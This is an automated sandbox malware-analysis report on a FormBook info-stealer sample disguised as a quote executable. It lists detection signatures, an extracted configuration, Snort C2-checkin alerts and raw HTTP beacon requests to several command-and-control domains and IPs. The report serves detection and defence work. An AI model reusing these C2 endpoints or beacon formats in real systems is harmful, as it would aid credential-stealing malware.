Analysis Report quote20210126.exe.bin

Overview

General Information

Sample Name:	quote20210126.exe.bin (renamed file extension from bin to exe)
Analysis ID:	344748
MD5:	1685762eb9eb252f560a5e7a33f78ef1
SHA1:	8069ef4b521b80772e3af6d7e5fd162f824d2c96
SHA256:	33c5a410d6ac03a18a033a6162b958efec61a9ab0caf991ecf6bc3a7d0ae0528
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 6.2.quote20210126.exe.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d70e", "CONFIG SIZE : 0xbb", "CONFIG OFFSET 0x1d807", "URL SIZE : 23", "searching string pattern", "strings_offset 0x1c363", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xd68e3618", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: quote20210126.exe.exe

ReversingLabs: Detection: 15%

Yara detected FormBook

Source: Yara match	File source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: quote20210126.exe.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.quote20210126.exe.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: quote20210126.exe.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: quote20210126.exe.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: systray.pdb source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: systray.pdbGCTL source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_061DC380
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_061DC434
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_061DC371
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 4x nop then pop esi	6_2_004172D3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT HTTP/1.1Host: www.0343888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 198.49.23.144 198.49.23.144
Source: Joe Sandbox View	IP Address: 198.49.23.144 198.49.23.144
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG

Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT HTTP/1.1Host: www.0343888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.qianglongzhipin.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 02:18:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://box2136.temp.domains/~recurre4/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 72 65 63 75 72 72 65 6e 74 63 6f 72 6e 65 61 6c 65 72 6f 73 69 6f 6e 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 62 6f 78 32 31 33 36 2e 74 65 6d 70 2e 64 6f 6d 61 69 6e 73 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 30 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 31 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 32 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 72 65 63 75 72 72 65 6e 74 63 6f 72 6e 65 61 6c 65 72 6f 73 69 6f 6e 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 6f 78 32 31 33 36 2e 74 65 6d 70 2e 64 6f 6d 61 69 6e 73 2f 7e 72 65 63 75 72 72 65 34 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70

Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: quote20210126.exe.exe, 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet1.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet1.xsdUhttp://tempuri.org/RealProjectDataSet2.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet2.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet3.xsd
